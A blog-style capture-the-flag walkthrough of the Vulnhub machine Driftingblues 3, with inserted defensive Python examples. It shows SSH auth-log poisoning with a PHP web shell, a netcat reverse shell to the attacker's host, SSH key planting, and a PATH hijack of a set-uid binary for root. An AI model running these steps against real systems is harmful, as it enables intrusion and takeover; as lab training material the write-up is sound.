Vulnhub: Driftingblues 3 target machine walkthrough

Driftingblues 3

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.17.55.0/16   |   Screen View: Unique Hosts                                                                                                                                                               
                                                                                                                                                                                                                                  
 6 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 360                                                                                                                                                                  
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                 
 192.168.56.100  08:00:27:89:65:85      3     180  PCS Systemtechnik GmbH                                                                                                                                                         
 192.168.56.192  08:00:27:21:cd:af      2     120  PCS Systemtechnik GmbH         

Using the netdiscover tool that ships with Kali Linux, the target's IP address is identified as 192.168.56.192.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.192 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-18 23:54 EST
Nmap scan report for bogon (192.168.56.192)
Host is up (0.000078s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/eventadmins
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:21:CD:AF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.09 seconds
                                                                

The NMAP scan shows that the target host has 2 open ports: 22 (SSH) and 80 (HTTP).

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ curl http://192.168.56.192/robots.txt
User-agent: *
Disallow: /eventadmins      
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ curl http://192.168.56.192/eventadmins/
<!DOCTYPE html>
<html>
<body>
<p>man there's a problem with ssh</p>
<p>john said "it's poisonous!!! stay away!!!"</p>
<p>idk if he's mentally challenged</p>
<p>please find and fix it</p>
<p>also check /littlequeenofspades.html</p>
<p>your buddy, buddyG</p>
</body>
</html> 

The returned page links to a new page and also exposes what may be usernames: john, idk, buddyG

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ curl http://192.168.56.192/littlequeenofspades.html
<!DOCTYPE html>
<html>
<body>
<p>Now, she is a little queen of spades, and the men will not let her be                                </p>
<p>Mmmm, she is the little queen of spades, and the men will not let her be             </p>
<p>Everytime she makes a spread, hoo fair brown, cold chill just runs all over me       </p>
<p>I'm gon' get me a gamblin' woman, if the last thing that I do                        </p>
<p>Eee, gon' get me a gamblin' woman, if it's the last thing that I do                  </p>
<p>Well, a man don't need a woman, ooh fair brown, that he got to give all his money to </p>
<p>Everybody say she got a mojo, now she's been usin' that stuff                        </p>
<p>Mmmm, mmmm, 'verybody says she got a mojo, 'cause she been usin' that stuff          </p>
<p>But she got a way trimmin' down, hoo fair brown, and I mean it's most too tough      </p>
<p>Now, little girl, since I am the king, baby, and you is a queen                      </p>
<p>Ooo eee, since I am the king baby, and you is a queen                                </p>
<p>Le's us put our heads together, hoo fair brown, then we can make our money green     </p>
<p style="color:white">aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==</p>
</html>       

One P tag in the returned page source is styled white, so its text cannot be seen in a browser. Decode it first:

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ echo "aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==" | base64 -d
intruder? L2FkbWluc2ZpeGl0LnBocA==                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ echo "L2FkbWluc2ZpeGl0LnBocA==" | base64 -d                        
/adminsfixit.php           

This reveals another page, and it ties in with the content of the /eventadmins page: it appears to be related to ssh.

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ curl http://192.168.56.192/adminsfixit.php         
<!DOCTYPE html>
<html>
<body>
<p>#######################################################################</p>
<p>ssh auth log</p>
<p>============</p>
<p>i hope some wacky and uncharacteristic thing would not happen</p>
<p>this job is fucking poisonous and im boutta planck length away from quitting this hoe</p>
<p>-abuzer komurcu</p>
<p>#######################################################################</p>
<p> </p>
<p> </p>
</html>
Nov 18 22:41:01 driftingblues CRON[752]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:41:01 driftingblues CRON[752]: pam_unix(cron:session): session closed for user root
Nov 18 22:42:01 driftingblues CRON[756]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:42:01 driftingblues CRON[756]: pam_unix(cron:session): session closed for user root
Nov 18 22:43:01 driftingblues CRON[760]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:43:01 driftingblues CRON[760]: pam_unix(cron:session): session closed for user root
Nov 18 22:44:01 driftingblues CRON[764]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:44:01 driftingblues CRON[764]: pam_unix(cron:session): session closed for user root
Nov 18 22:45:01 driftingblues CRON[768]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:45:01 driftingblues CRON[768]: pam_unix(cron:session): session closed for user root
Nov 18 22:46:01 driftingblues CRON[777]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:46:01 driftingblues CRON[777]: pam_unix(cron:session): session closed for user root
Nov 18 22:47:01 driftingblues CRON[781]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:47:01 driftingblues CRON[781]: pam_unix(cron:session): session closed for user root
Nov 18 22:48:01 driftingblues CRON[785]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:48:01 driftingblues CRON[785]: pam_unix(cron:session): session closed for user root
Nov 18 22:49:01 driftingblues CRON[789]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:49:01 driftingblues CRON[789]: pam_unix(cron:session): session closed for user root
Nov 18 22:50:01 driftingblues CRON[798]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:50:01 driftingblues CRON[798]: pam_unix(cron:session): session closed for user root
Nov 18 22:51:01 driftingblues CRON[803]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:51:01 driftingblues CRON[803]: pam_unix(cron:session): session closed for user root
Nov 18 22:52:01 driftingblues CRON[807]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:52:01 driftingblues CRON[807]: pam_unix(cron:session): session closed for user root
Nov 18 22:53:01 driftingblues CRON[811]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:53:01 driftingblues CRON[811]: pam_unix(cron:session): session closed for user root
Nov 18 22:54:01 driftingblues CRON[815]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:54:01 driftingblues CRON[815]: pam_unix(cron:session): session closed for user root
Nov 18 22:54:39 driftingblues sshd[823]: Did not receive identification string from 192.168.56.137 port 38088
Nov 18 22:54:45 driftingblues sshd[824]: Protocol major versions differ for 192.168.56.137 port 40350: SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2 vs. SSH-1.5-Nmap-SSH1-Hostkey
Nov 18 22:54:45 driftingblues sshd[825]: Protocol major versions differ for 192.168.56.137 port 40364: SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2 vs. SSH-1.5-NmapNSE_1.0
Nov 18 22:54:45 driftingblues sshd[826]: Unable to negotiate with 192.168.56.137 port 40380: no matching host key type found. Their offer: ssh-dss [preauth]
Nov 18 22:54:45 driftingblues sshd[828]: Connection closed by 192.168.56.137 port 40382 [preauth]
Nov 18 22:54:45 driftingblues sshd[830]: Connection closed by 192.168.56.137 port 40398 [preauth]
Nov 18 22:54:45 driftingblues sshd[832]: Unable to negotiate with 192.168.56.137 port 40400: no matching host key type found. Their offer: ecdsa-sha2-nistp384 [preauth]
Nov 18 22:54:45 driftingblues sshd[834]: Unable to negotiate with 192.168.56.137 port 40404: no matching host key type found. Their offer: ecdsa-sha2-nistp521 [preauth]
Nov 18 22:54:45 driftingblues sshd[836]: Connection closed by 192.168.56.137 port 40418 [preauth]
Nov 18 22:55:01 driftingblues CRON[838]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:55:01 driftingblues CRON[838]: pam_unix(cron:session): session closed for user root
Nov 18 22:56:01 driftingblues CRON[844]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:56:01 driftingblues CRON[844]: pam_unix(cron:session): session closed for user root
Nov 18 22:57:01 driftingblues CRON[848]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:57:01 driftingblues CRON[848]: pam_unix(cron:session): session closed for user root
Nov 18 22:58:01 driftingblues CRON[852]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:58:01 driftingblues CRON[852]: pam_unix(cron:session): session closed for user root
Nov 18 22:59:01 driftingblues CRON[860]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:59:01 driftingblues CRON[860]: pam_unix(cron:session): session closed for user root
Nov 18 23:00:01 driftingblues CRON[864]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 23:00:01 driftingblues CRON[864]: pam_unix(cron:session): session closed for user root
Nov 18 23:01:01 driftingblues CRON[869]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 23:01:01 driftingblues CRON[869]: pam_unix(cron:session): session closed for user root
Nov 18 23:02:01 driftingblues CRON[873]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 23:02:01 driftingblues CRON[873]: pam_unix(cron:session): session closed for user root
Nov 18 23:03:01 driftingblues CRON[877]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 23:03:01 driftingblues CRON[877]: pam_unix(cron:session): session closed for user root
Nov 18 23:04:01 driftingblues CRON[885]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 23:04:01 driftingblues CRON[885]: pam_unix(cron:session): session closed for user root
Nov 18 23:05:01 driftingblues CRON[889]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 23:05:01 driftingblues CRON[889]: pam_unix(cron:session): session closed for user root
Nov 18 23:06:01 driftingblues CRON[893]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 23:06:01 driftingblues CRON[893]: pam_unix(cron:session): session closed for user root
Nov 18 23:07:01 driftingblues CRON[898]: pam_unix(cron:session): session opened for user root by (uid=0)

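The page prints the ssh auth log, and sshd records the user name of every login attempt in it. Is it possible to inject a command into this ssh auth log file and then have it executed by requesting the file?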

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ ssh '<?php system($_GET["cmd"]); ?>'@192.168.56.192 
The authenticity of host '192.168.56.192 (192.168.56.192)' can't be established.
ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:35: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.192' (ED25519) to the list of known hosts.
<?php system($_GET["cmd"]); ?>@192.168.56.192: Permission denied (publickey).

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ curl http://192.168.56.192/adminsfixit.php?cmd=whoami | grep www
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 43535    0 43535    0     0  10.7M      0 --:--:-- --:--:-- --:--:-- 13.8M
Nov 19 01:56:41 driftingblues sshd[2118]: Invalid user www-data
Nov 19 01:56:41 driftingblues sshd[2118]: Connection closed by invalid user www-data
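Seen from the defender's side, the injection above leaves an SSH user name in the auth log that no real account would have. The following is an added example, not part of the original write-up: it parses sshd lines in the format shown on this page and flags user names that carry PHP tags or fall outside a normal login-name pattern. The sample lines, the regular expressions and the function names are assumptions of the example.

```python
import re

# Constructed sample lines in the syslog/sshd format shown on this page.
# PIDs, ports and the extra user names are made up for the example.
SAMPLE_LOG = '''\
Nov 19 01:50:02 driftingblues sshd[2101]: Invalid user admin from 192.168.56.137 port 40512
Nov 19 01:56:41 driftingblues sshd[2118]: Invalid user <?php system($_GET["cmd"]); ?> from 192.168.56.137 port 40620
Nov 19 01:56:41 driftingblues sshd[2118]: Connection closed by invalid user <?php system($_GET["cmd"]); ?> 192.168.56.137 port 40620 [preauth]
Nov 19 01:57:01 driftingblues CRON[2120]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 19 01:58:10 driftingblues sshd[2125]: Invalid user test user from 192.168.56.137 port 40700
'''

# The user field is matched lazily and the line is anchored at its end, so a
# name containing spaces (or a fake " from ... port ..." fragment) is still
# captured whole instead of being cut at the first space.
SSHD_USER = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|Connection closed by invalid user) "
    r"(?P<user>.*?)(?: from)? (?P<ip>\S+) port \d+(?: \[preauth\])?$"
)
# Conservative login-name shape; anything else is worth a second look.
SAFE_NAME = re.compile(r"[a-z_][a-z0-9_-]{0,31}")
CODE_MARKERS = ("<?", "?>")  # PHP open/close tags


def classify(user):
    """Return None for an ordinary login name, else 'code' or 'odd'."""
    if any(marker in user for marker in CODE_MARKERS):
        return "code"
    if not SAFE_NAME.fullmatch(user):
        return "odd"
    return None


def scan(log_text):
    """Return (verdict, user, source_ip) for every suspicious sshd line."""
    findings = []
    for line in log_text.splitlines():
        match = SSHD_USER.search(line.rstrip())
        if not match:
            continue  # not an sshd invalid-user line (e.g. CRON)
        verdict = classify(match["user"])
        if verdict:
            findings.append((verdict, match["user"], match["ip"]))
    return findings


if __name__ == "__main__":
    for verdict, user, ip in scan(SAMPLE_LOG):
        print(f"{verdict:4} user={user!r} src={ip}")
```

Detection only narrows the window; the fix is on the web side, where a page that displays a log should emit it as escaped text rather than pass it through the PHP interpreter.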

Command execution works, so the next step is to get a reverse shell back to Kali Linux.

Visit in a browser:

http://192.168.56.192/adminsfixit.php?cmd=nc%20-e%20/bin/sh%20192.168.56.137%205555

Kali Linux successfully receives the shell sent back by the target host:

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.192] 46014
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@driftingblues:/var/www/html$ 

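In the home directory the user flag cannot be opened. Looking in .ssh, there is no RSA key, which is a little odd. The ssh configuration file /etc/ssh/sshd_config shows that public-key login is allowed, and it gives the file name /home/robertj/.ssh/authorized_keys.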

www-data@driftingblues:/home/robertj/.ssh$ cat /etc/ssh/sshd_config
cat /etc/ssh/sshd_config
#       $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

Port 22
#AddressFamily any
ListenAddress 0.0.0.0
#ListenAddress ::

HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
SyslogFacility AUTH
LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin no
StrictModes no
#MaxAuthTries 6
#MaxSessions 10

PubkeyAuthentication yes

# Expect .ssh/authorized_keys2 to be disregarded by default in future.
AuthorizedKeysFile      /home/robertj/.ssh/authorized_keys

Now follow that requirement (the file name is the one sshd_config specifies):

www-data@driftingblues:/home/robertj/.ssh$ ssh-keygen -t rsa
ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/var/www/.ssh/id_rsa): /home/robertj/.ssh/authorized_keys     
/home/robertj/.ssh/authorized_keys
Enter passphrase (empty for no passphrase): 

Enter same passphrase again: 

Your identification has been saved in /home/robertj/.ssh/authorized_keys.
Your public key has been saved in /home/robertj/.ssh/authorized_keys.pub.
The key fingerprint is:
SHA256:qQfcINfB0fG3Z+xjF6hiFyQicLTXPUe2j3NGJUGf088 www-data@driftingblues
The key's randomart image is:
+---[RSA 2048]----+
|   ..o .oo.. ++..|
|    o ..o.o.o .o+|
|    .ooo.o +.o.+o|
|     +oo..o o.=+o|
|      o S  . +.=E|
|       o    o ++.|
|      . .o o   oo|
|       .. o   . o|
|                 |
+----[SHA256]-----+

Rename the public key file so that it exactly matches sshd_config:

www-data@driftingblues:/home/robertj/.ssh$ ls -alh
ls -alh
total 16K
drwx---rwx 2 robertj  robertj  4.0K Nov 19 02:22 .
drwxr-xr-x 3 robertj  robertj  4.0K Jan  4  2021 ..
-rw------- 1 www-data www-data 1.8K Nov 19 02:22 authorized_keys
-rw-r--r-- 1 www-data www-data  404 Nov 19 02:22 authorized_keys.pub
www-data@driftingblues:/home/robertj/.ssh$ cat authorized_keys > id_rsa
cat authorized_keys > id_rsa
www-data@driftingblues:/home/robertj/.ssh$ cat authorized_keys.pub > authorized_keys
<rtj/.ssh$ cat authorized_keys.pub > authorized_keys
www-data@driftingblues:/home/robertj/.ssh$ which python
which python
/usr/bin/python
www-data@driftingblues:/home/robertj/.ssh$ which python3
which python3
/usr/bin/python3
www-data@driftingblues:/home/robertj/.ssh$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.137 - - [19/Nov/2022 02:26:58] "GET /id_rsa HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ ssh -i id_rsa robertj@192.168.56.192
Enter passphrase for key 'id_rsa': 
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
robertj@driftingblues:~$ id
uid=1000(robertj) gid=1000(robertj) groups=1000(robertj),1001(operators)
robertj@driftingblues:~$ 
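The settings that made this step possible can be checked mechanically. The following is an added example, not part of the original write-up: it audits the directives from the sshd_config dump above together with the .ssh directory mode and key-file owner from the ls listing. The function names and the selection of checks are assumptions of the example.

```python
import stat

# Directives copied from the sshd_config dump on this page (comment lines trimmed).
PAGE_CONFIG = """\
PermitRootLogin no
StrictModes no
PubkeyAuthentication yes
AuthorizedKeysFile      /home/robertj/.ssh/authorized_keys
"""


def parse_sshd_config(text):
    """Return {lowercased keyword: value}. sshd uses the first value it sees."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)  # keyword and value may be tab-separated
        value = parts[1].strip() if len(parts) > 1 else ""
        settings.setdefault(parts[0].lower(), value)
    return settings


def audit(settings, ssh_dir_mode, key_file_owner, account):
    """ssh_dir_mode and key_file_owner are the values os.stat() would report
    for the account's .ssh directory and its authorized_keys file."""
    findings = []
    if settings.get("strictmodes", "yes").lower() == "no":
        findings.append("StrictModes no: sshd does not check ownership or modes of key files")
    for path in settings.get("authorizedkeysfile", "").split():
        # An absolute path without %u or %h is the same file for every account.
        if path.startswith("/") and "%u" not in path and "%h" not in path:
            findings.append(f"AuthorizedKeysFile {path}: one fixed file is consulted for every account")
    if ssh_dir_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f".ssh mode {stat.S_IMODE(ssh_dir_mode):04o}: writable by group or others")
    if key_file_owner != account:
        findings.append(f"authorized_keys owned by {key_file_owner}, not {account}")
    return findings


if __name__ == "__main__":
    # drwx---rwx is mode 0707; the key file in the listing belongs to www-data.
    for finding in audit(parse_sshd_config(PAGE_CONFIG), 0o707, "www-data", "robertj"):
        print("-", finding)
```

With StrictModes left at its default of yes, a .ssh directory that other users can write to makes sshd ignore the key file.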

Got the user flag:

robertj@driftingblues:~$ ls
user.txt
robertj@driftingblues:~$ cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█



robertj@driftingblues:~$ 

Privilege escalation

Upload the linpeas.sh script to the target host's /tmp directory, change its permissions and run it. The output points to an executable:

robertj@driftingblues:~$ ls -alh /usr/bin/getinfo
-r-sr-s--- 1 root operators 17K Jan  4  2021 /usr/bin/getinfo
robertj@driftingblues:~$ /usr/bin/getinfo
###################
ip address
###################

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 08:00:27:21:cd:af brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.192/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 348sec preferred_lft 348sec
    inet6 fe80::a00:27ff:fe21:cdaf/64 scope link 
       valid_lft forever preferred_lft forever
###################
hosts
###################

127.0.0.1       localhost
127.0.1.1       driftingblues

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
###################
os info
###################

Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
robertj@driftingblues:~$ 

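The getinfo command presumably runs the ip command, among others. Privilege escalation therefore comes down to creating a file with the same name, for example ip, that actually runs /bin/bash. This ip file can be placed in /tmp, and the $PATH variable modified: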


robertj@driftingblues:~$ export PATH=/tmp:$PATH
robertj@driftingblues:~$ cd /tmp
robertj@driftingblues:/tmp$ echo '/bin/bash' > ip
robertj@driftingblues:/tmp$ chmod 777 ip
robertj@driftingblues:/tmp$ /usr/bin/getinfo
###################
ip address
###################

root@driftingblues:/tmp# cd /root
root@driftingblues:/root# ls -alh
total 20K
drwx------  2 root root 4.0K Jan  4  2021 .
drwxr-xr-x 18 root root 4.0K Dec 17  2020 ..
-rw-------  1 root root   48 Jan  4  2021 .bash_history
-r-x------  1 root root 1.8K Dec 17  2020 root.txt
-rw-r--r--  1 root root 1.1K Jan  4  2021 upit
root@driftingblues:/root# cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█

congratulations!

root@driftingblues:/root# 

Successfully obtained the root flag.
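The escalation works because a privileged program looked up a bare command name through a PATH its caller controls. The following is an added example, not part of the original write-up: it shows how the lookup order decides which file runs, and flags PATH entries that other users can write to. The directories are throwaway stand-ins built by the example, and the function names are assumptions.

```python
import os
import shutil
import stat
import tempfile


def risky_path_entries(path):
    """PATH entries where another user can plant a command: empty or relative
    entries (resolved against the current directory) and directories that are
    writable by group or others."""
    risky = []
    for entry in path.split(os.pathsep):
        if not entry or not os.path.isabs(entry):
            risky.append((entry, "relative or empty entry"))
            continue
        try:
            mode = os.stat(entry).st_mode
        except OSError:
            continue  # a missing directory cannot shadow anything
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            risky.append((entry, "writable by group or others"))
    return risky


def resolve(command, path):
    """First executable named `command` along `path`, as an exec lookup finds it."""
    return shutil.which(command, path=path)


def demo():
    """Two stand-in directories, each with its own `ip`: 'sbin' plays the
    system directory, 'tmp' a world-writable one such as /tmp."""
    with tempfile.TemporaryDirectory() as root:
        system_dir = os.path.join(root, "sbin")
        shared_dir = os.path.join(root, "tmp")
        for directory, mode in ((system_dir, 0o755), (shared_dir, 0o777)):
            os.mkdir(directory)
            os.chmod(directory, mode)
            tool = os.path.join(directory, "ip")
            with open(tool, "w") as handle:
                handle.write("#!/bin/sh\n")
            os.chmod(tool, 0o755)
        inherited = shared_dir + os.pathsep + system_dir  # caller-supplied PATH
        return {
            "inherited": os.path.relpath(resolve("ip", inherited), root),
            "pinned": os.path.relpath(resolve("ip", system_dir), root),
            "risky": [reason for _, reason in risky_path_entries(inherited)],
        }


if __name__ == "__main__":
    print(demo())
```

A set-uid or set-gid program avoids the problem by calling its helpers by absolute path and setting PATH itself instead of inheriting it from the caller.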

posted @ 2022-11-19 16:57  Jason_huawen